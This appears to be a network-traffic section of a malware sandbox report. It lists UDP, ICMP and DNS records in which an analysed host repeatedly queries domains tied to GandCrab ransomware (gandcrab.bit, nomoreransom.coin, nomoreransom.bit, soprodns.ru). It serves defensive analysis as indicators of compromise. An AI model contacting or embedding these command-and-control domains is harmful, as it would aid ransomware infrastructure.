Aug 31, 2022 23:59:50.648333073 CEST | 53 | 64125 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:50.649034023 CEST | 64126 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:50.668668032 CEST | 53 | 64126 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:51.926340103 CEST | 64967 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:51.954930067 CEST | 53 | 64967 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:51.969147921 CEST | 64968 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:51.988468885 CEST | 53 | 64968 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:51.989362001 CEST | 64969 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:52.008342981 CEST | 53 | 64969 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:52.023263931 CEST | 64970 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:52.042766094 CEST | 53 | 64970 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:52.043279886 CEST | 64971 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:52.062791109 CEST | 53 | 64971 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:52.063211918 CEST | 64972 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:52.083273888 CEST | 53 | 64972 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:53.315284014 CEST | 60825 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:53.888886929 CEST | 53 | 60825 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:53.910933018 CEST | 60826 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:53.930005074 CEST | 53 | 60826 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:53.930680037 CEST | 60827 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:53.951704979 CEST | 53 | 60827 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:53.952245951 CEST | 60828 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:53.972112894 CEST | 53 | 60828 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:53.975918055 CEST | 60829 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:53.996426105 CEST | 53 | 60829 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:53.997132063 CEST | 60830 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:54.017124891 CEST | 53 | 60830 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:55.249011993 CEST | 49201 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:56.259572983 CEST | 49201 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:56.294773102 CEST | 53 | 49201 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:56.303123951 CEST | 49202 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:56.322354078 CEST | 53 | 49202 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:56.322889090 CEST | 49203 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:56.342601061 CEST | 53 | 49203 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:56.342972994 CEST | 49204 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:56.360450983 CEST | 53 | 49204 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:56.360950947 CEST | 49205 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:56.380527020 CEST | 53 | 49205 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:56.381031036 CEST | 49206 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:56.400538921 CEST | 53 | 49206 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:56.951119900 CEST | 53 | 49201 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:57.561789036 CEST | 64936 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:57.635045052 CEST | 53 | 64936 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:57.647419930 CEST | 64937 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:57.666646004 CEST | 53 | 64937 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:57.667177916 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:57.687072039 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:57.687539101 CEST | 64939 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:57.705380917 CEST | 53 | 64939 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:57.705862045 CEST | 64940 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:57.725605011 CEST | 53 | 64940 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:57.726016045 CEST | 64941 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:57.745647907 CEST | 53 | 64941 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:58.812098026 CEST | 60473 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:59.818274021 CEST | 60473 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:59.852207899 CEST | 53 | 60473 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:59.859764099 CEST | 60474 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:59.877156019 CEST | 53 | 60474 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:59.877731085 CEST | 60475 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:59.898338079 CEST | 53 | 60475 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:59.898864031 CEST | 60476 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:59.918551922 CEST | 53 | 60476 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:59.919053078 CEST | 60477 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:59.938997030 CEST | 53 | 60477 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:59.939438105 CEST | 60478 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:59.959988117 CEST | 53 | 60478 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:01.037652969 CEST | 59374 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:02.037312031 CEST | 59374 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:02.071805954 CEST | 53 | 59374 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:02.080656052 CEST | 56617 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:02.100327969 CEST | 53 | 56617 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:02.100950956 CEST | 56618 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:02.120507956 CEST | 53 | 56618 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:02.120944977 CEST | 56619 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:02.141537905 CEST | 53 | 56619 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:02.142087936 CEST | 56620 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:02.160455942 CEST | 53 | 56620 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:02.160962105 CEST | 56621 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:02.179536104 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:02.700483084 CEST | 53 | 59374 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:03.267693043 CEST | 61184 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:03.343596935 CEST | 53 | 61184 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:03.353477001 CEST | 61185 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:03.370637894 CEST | 53 | 61185 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:03.371157885 CEST | 61186 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:03.390731096 CEST | 53 | 61186 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:03.391253948 CEST | 61187 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:03.410953045 CEST | 53 | 61187 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:03.411292076 CEST | 61188 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:03.430705070 CEST | 53 | 61188 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:03.431119919 CEST | 61189 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:03.450587988 CEST | 53 | 61189 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:03.829907894 CEST | 53 | 60473 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:04.517784119 CEST | 57387 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:05.091319084 CEST | 53 | 57387 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:05.099412918 CEST | 57388 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:05.118396044 CEST | 53 | 57388 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:05.118977070 CEST | 57389 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:05.138398886 CEST | 53 | 57389 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:05.138813972 CEST | 57390 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:05.158288956 CEST | 53 | 57390 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:05.158775091 CEST | 57391 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:05.176443100 CEST | 53 | 57391 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:05.176877975 CEST | 57392 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:05.194662094 CEST | 53 | 57392 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:06.266103029 CEST | 50228 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:07.256401062 CEST | 50228 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:07.399528980 CEST | 53 | 50228 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:07.412708044 CEST | 50229 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:07.432984114 CEST | 53 | 50229 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:07.433896065 CEST | 50230 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:07.454828024 CEST | 53 | 50230 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:07.455720901 CEST | 50231 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:07.479063988 CEST | 53 | 50231 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:07.481525898 CEST | 50232 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:07.501718998 CEST | 53 | 50232 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:07.502496004 CEST | 50233 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:07.524806976 CEST | 53 | 50233 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:07.918035030 CEST | 53 | 50228 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:08.675157070 CEST | 53269 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:09.687948942 CEST | 53269 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:09.840522051 CEST | 53 | 53269 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:09.849908113 CEST | 53270 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:09.867008924 CEST | 53 | 53270 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:09.867791891 CEST | 53271 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:09.887459040 CEST | 53 | 53271 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:09.889720917 CEST | 59828 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:09.910227060 CEST | 53 | 59828 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:09.911396027 CEST | 59829 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:09.933176994 CEST | 53 | 59829 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:09.936009884 CEST | 59830 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:09.956068039 CEST | 53 | 59830 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:11.257081985 CEST | 51105 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:11.285418034 CEST | 53 | 51105 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:11.291388988 CEST | 52456 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:11.304387093 CEST | 53 | 53269 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:11.310426950 CEST | 53 | 52456 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:11.310934067 CEST | 52457 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:11.330421925 CEST | 53 | 52457 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:11.330852985 CEST | 52458 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:11.350558043 CEST | 53 | 52458 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:11.350931883 CEST | 52459 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:11.370852947 CEST | 53 | 52459 | 8.8.8.8 | 192.168.2.3
Sep 1, 2022 00:00:11.371195078 CEST | 52460 | 53 | 192.168.2.3 | 8.8.8.8
Sep 1, 2022 00:00:11.388839006 CEST | 53 | 52460 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Aug 31, 2022 23:58:18.899866104 CEST | 192.168.2.3 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:58:21.675904036 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:58:28.756336927 CEST | 192.168.2.3 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:58:40.380204916 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:58:43.196728945 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:18.697181940 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:20.757663965 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:27.705205917 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:32.146743059 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:36.792562962 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:39.088548899 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:45.793106079 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:46.698131084 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:48.699120045 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:50.593031883 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Aug 31, 2022 23:59:56.952230930 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Sep 1, 2022 00:00:02.702019930 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Sep 1, 2022 00:00:03.830478907 CEST | 192.168.2.3 | 8.8.8.8 | cff3 | (Port unreachable) | Destination Unreachable
Sep 1, 2022 00:00:07.922203064 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Sep 1, 2022 00:00:11.304521084 CEST | 192.168.2.3 | 8.8.8.8 | d030 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 31, 2022 23:58:02.760505915 CEST | 192.168.2.3 | 8.8.8.8 | 0xfb1f | Standard query (0) | ipv4bot.whatismyipaddress.com | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:04.036793947 CEST | 192.168.2.3 | 8.8.8.8 | 0x837d | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:04.671662092 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:04.692158937 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:04.718662977 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:04.739443064 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:04.757896900 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:07.165702105 CEST | 192.168.2.3 | 8.8.8.8 | 0xc956 | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:07.294450998 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:07.312591076 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:07.331283092 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:07.365561008 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:07.384051085 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:13.881591082 CEST | 192.168.2.3 | 8.8.8.8 | 0x17 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:14.902959108 CEST | 192.168.2.3 | 8.8.8.8 | 0x17 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:14.982489109 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:15.004693985 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:15.025135994 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:15.043750048 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:15.064662933 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:17.123805046 CEST | 192.168.2.3 | 8.8.8.8 | 0xbb4f | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.161257982 CEST | 192.168.2.3 | 8.8.8.8 | 0xbb4f | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.284126997 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:18.304316998 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.324816942 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:18.345424891 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:18.371185064 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:20.518393040 CEST | 192.168.2.3 | 8.8.8.8 | 0xccdb | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.514583111 CEST | 192.168.2.3 | 8.8.8.8 | 0xccdb | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.674954891 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:21.699516058 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.721379995 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:21.744663000 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:21.768917084 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:23.738740921 CEST | 192.168.2.3 | 8.8.8.8 | 0xea6e | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:24.732259989 CEST | 192.168.2.3 | 8.8.8.8 | 0xea6e | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:24.850137949 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:24.884406090 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:24.905091047 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:24.925441980 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:24.944174051 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:27.219465017 CEST | 192.168.2.3 | 8.8.8.8 | 0xa774 | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:27.292717934 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:27.316054106 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:27.336745024 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:27.361900091 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:27.382469893 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:32.660929918 CEST | 192.168.2.3 | 8.8.8.8 | 0xaf62 | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:33.320008993 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:33.338202000 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:33.358758926 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:33.379307032 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:33.402808905 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:35.661753893 CEST | 192.168.2.3 | 8.8.8.8 | 0xd7cb | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:36.532491922 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:36.550637007 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:36.580327988 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:36.600605965 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:36.619046926 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:38.594002962 CEST | 192.168.2.3 | 8.8.8.8 | 0x3115 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:39.608630896 CEST | 192.168.2.3 | 8.8.8.8 | 0x3115 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:39.711462975 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:39.736547947 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:39.762542009 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:39.799617052 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:39.827074051 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:41.899421930 CEST | 192.168.2.3 | 8.8.8.8 | 0x4b60 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:42.906723976 CEST | 192.168.2.3 | 8.8.8.8 | 0x4b60 | Standard query (0) | dns2.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:42.963799000 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:42.984219074 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
